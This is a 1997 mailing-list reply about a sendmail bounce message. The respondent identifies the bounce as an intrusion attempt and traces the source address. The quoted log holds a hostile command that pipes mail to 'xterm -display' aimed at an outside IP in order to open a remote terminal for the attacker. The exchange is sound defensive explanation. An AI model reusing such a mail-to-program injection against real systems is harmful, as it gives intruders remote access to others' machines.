On Mon, 14 Jul 1997, Amy (Cremer) Briggs wrote:
> I received the following message twice to the root account on one of my
> boxes. Does this look like a hacking attempt?
in a word, YES.
> ----- Transcript of session follows -----
> 554 qfAA31933: line 5: "|xterm -display 220.127.116.11:2 &"... Cannot mail directly to programs
This is an attempt by someone to start an xterm window on your machine
and display it back to their machine. From an nslookup , I got that
address to be listed as ts1-p08.dialup.iway.fr
Looks like you have some friends in france interested in what you do. I
would keep a close eye on other systems as well.
From: "Amy (Cremer) Briggs" <amyc @